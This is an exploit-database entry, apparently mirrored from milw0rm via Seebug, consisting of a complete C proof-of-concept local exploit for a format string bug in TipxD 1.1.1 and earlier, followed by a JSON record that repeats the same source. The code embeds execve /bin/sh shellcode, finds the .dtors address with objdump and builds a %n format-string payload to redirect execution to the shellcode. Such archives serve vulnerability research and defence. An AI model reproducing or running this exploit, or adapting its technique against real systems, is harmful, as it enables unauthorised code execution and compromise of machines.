ID SSV:62943
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
/* tipxd_exp.c
TipxD Format String Vulnerability
TipxD <= 1.1.1 local exploit (Proof of Concept)
Tested in Slackware 9.0 / 9.1 / 10.0
by CoKi <coki@nosystem.com.ar> - SECU
No System Group - http://www.nosystem.com.ar
*/
#include <stdio.h>
#include <string.h>
#define PATH "/bin/tipxd"
#define OBJDUMP "/usr/bin/objdump"
#define GREP "/usr/bin/grep"
unsigned char shellcode[]= /* aleph1 shellcode.45b */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68";
int check(unsigned long addr);
int main(int argc, char *argv[]) {
int i, dtorsaddr;
unsigned int bal1, bal2, bal3, bal4;
char temp[512];
char buffer[1024];
char nop1[255], nop2[255];
char nop3[255], nop4[255];
int cn1, cn2, cn3, cn4;
FILE *f;
char *env[3] = {shellcode, NULL};
int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);
/* finding .dtors address */
sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
f = popen(temp, "r");
if(fscanf(f, " %08x", &dtorsaddr) != 1) {
pclose(f);
printf("Cannot find .dtors address\n");
exit(1);
}
pclose(f);
dtorsaddr = dtorsaddr + 4;
printf("\n TipxD <= 1.1.1 local exploit (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");
printf(" shellcode address = %.8p\n", shaddr);
printf(" .dtors address = %.8p\n\n", dtorsaddr);
bzero(temp, sizeof(temp));
bzero(buffer, sizeof(buffer));
strcat(buffer, "x");
/* adding .dtors address */
for(i = 0; i < 4; i++) {
bzero(temp, sizeof(temp));
sprintf(temp, "%s", &dtorsaddr);
strncat(buffer, temp, 4);
dtorsaddr++;
}
/* convert shellcode address location */
memset(nop1, 0, 255);
memset(nop2, 0, 255);
memset(nop3, 0, 255);
memset(nop4, 0, 255);
bal1 = (shaddr & 0xff000000) >> 24;
bal2 = (shaddr & 0x00ff0000) >> 16;
bal3 = (shaddr & 0x0000ff00) >> 8;
bal4 = (shaddr & 0x000000ff);
cn1 = bal4 - 16 - 15 - 48 - 2 -1;
cn1 = check(cn1);
cn2 = bal3 - bal4 - 2;
cn2 = check(cn2);
cn3 = bal2 - bal3 - 2;
cn3 = check(cn3);
cn4 = bal1 - bal2 - 2;
cn4 = check(cn4);
memset(nop1, '\x90', cn1);
memset(nop2, '\x90', cn2);
memset(nop3, '\x90', cn3);
memset(nop4, '\x90', cn4);
sprintf(temp, "%%08x%%08x%%08x%%08x%%08x%%08x"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n\x90\x90\x90\x90"
,nop1, nop2, nop3, nop4);
strcat(buffer, temp);
execle(PATH, "tipxd", "-f", buffer, NULL, env);
}
int check(unsigned long addr) {
char tmp[128];
snprintf(tmp, sizeof(tmp), "%d", addr);
if(atoi(tmp) < 1)
addr = addr + 256;
return addr;
}
// milw0rm.com [2004-12-14]
{"href": "https://www.seebug.org/vuldb/ssvid-62943", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "TipxD <= 1.1.1 - Local Format String Vulnerability (not setuid)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-62943", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n /* tipxd_exp.c\r\n\r\nTipxD Format String Vulnerability\r\n\r\nTipxD <= 1.1.1 local exploit (Proof of Concept)\r\n\r\nTested in Slackware 9.0 / 9.1 / 10.0\r\n\r\nby CoKi <coki@nosystem.com.ar> - SECU\r\nNo System Group - http://www.nosystem.com.ar\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n\r\n#define PATH "/bin/tipxd"\r\n#define OBJDUMP "/usr/bin/objdump"\r\n#define GREP "/usr/bin/grep"\r\n\r\nunsigned char shellcode[]= /* aleph1 shellcode.45b */\r\n"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c"\r\n"\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb"\r\n"\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e"\r\n"\\x2f\\x73\\x68";\r\n\r\nint check(unsigned long addr);\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\nint i, dtorsaddr;\r\nunsigned int bal1, bal2, bal3, bal4;\r\nchar temp[512];\r\nchar buffer[1024];\r\nchar nop1[255], nop2[255];\r\nchar nop3[255], nop4[255];\r\nint cn1, cn2, cn3, cn4;\r\nFILE *f;\r\nchar *env[3] = {shellcode, NULL};\r\nint shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);\r\n\r\n/* finding .dtors address */\r\nsprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);\r\nf = popen(temp, "r");\r\nif(fscanf(f, " %08x", &dtorsaddr) != 1) {\r\npclose(f);\r\nprintf("Cannot find .dtors address\\n");\r\nexit(1);\r\n}\r\npclose(f);\r\ndtorsaddr = dtorsaddr + 4;\r\n\r\nprintf("\\n TipxD <= 1.1.1 local exploit (Proof of Concept)\\n");\r\nprintf(" by CoKi <coki@nosystem.com.ar>\\n\\n");\r\nprintf(" shellcode address = %.8p\\n", shaddr);\r\nprintf(" .dtors address = %.8p\\n\\n", dtorsaddr);\r\n\r\nbzero(temp, sizeof(temp));\r\nbzero(buffer, sizeof(buffer));\r\n\r\nstrcat(buffer, "x");\r\n\r\n/* adding .dtors address */\r\nfor(i = 0; i < 4; i++) {\r\nbzero(temp, sizeof(temp));\r\nsprintf(temp, "%s", &dtorsaddr);\r\nstrncat(buffer, temp, 4);\r\ndtorsaddr++;\r\n}\r\n\r\n/* convert shellcode address location */\r\nmemset(nop1, 0, 255);\r\nmemset(nop2, 0, 255);\r\nmemset(nop3, 0, 255);\r\nmemset(nop4, 0, 255);\r\n\r\nbal1 = (shaddr & 0xff000000) >> 24;\r\nbal2 = (shaddr & 0x00ff0000) >> 16;\r\nbal3 = (shaddr & 0x0000ff00) >> 8;\r\nbal4 = (shaddr & 0x000000ff);\r\n\r\ncn1 = bal4 - 16 - 15 - 48 - 2 -1;\r\ncn1 = check(cn1);\r\ncn2 = bal3 - bal4 - 2;\r\ncn2 = check(cn2);\r\ncn3 = bal2 - bal3 - 2;\r\ncn3 = check(cn3);\r\ncn4 = bal1 - bal2 - 2;\r\ncn4 = check(cn4);\r\n\r\nmemset(nop1, '\\x90', cn1);\r\nmemset(nop2, '\\x90', cn2);\r\nmemset(nop3, '\\x90', cn3);\r\nmemset(nop4, '\\x90', cn4);\r\n\r\nsprintf(temp, "%%08x%%08x%%08x%%08x%%08x%%08x"\r\n"%s\\xeb\\x02%%n"\r\n"%s\\xeb\\x02%%n"\r\n"%s\\xeb\\x02%%n"\r\n"%s\\xeb\\x02%%n\\x90\\x90\\x90\\x90"\r\n,nop1, nop2, nop3, nop4);\r\n\r\nstrcat(buffer, temp);\r\n\r\nexecle(PATH, "tipxd", "-f", buffer, NULL, env);\r\n}\r\n\r\nint check(unsigned long addr) {\r\nchar tmp[128];\r\nsnprintf(tmp, sizeof(tmp), "%d", addr);\r\nif(atoi(tmp) < 1)\r\naddr = addr + 256;\r\n\r\nreturn addr;\r\n}\r\n\r\n// milw0rm.com [2004-12-14]\r\n\n ", "id": "SSV:62943", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T16:55:45", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-11-19T16:55:45", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:55:45", "rev": 2}, "vulnersScore": -0.1}, "references": []}
{}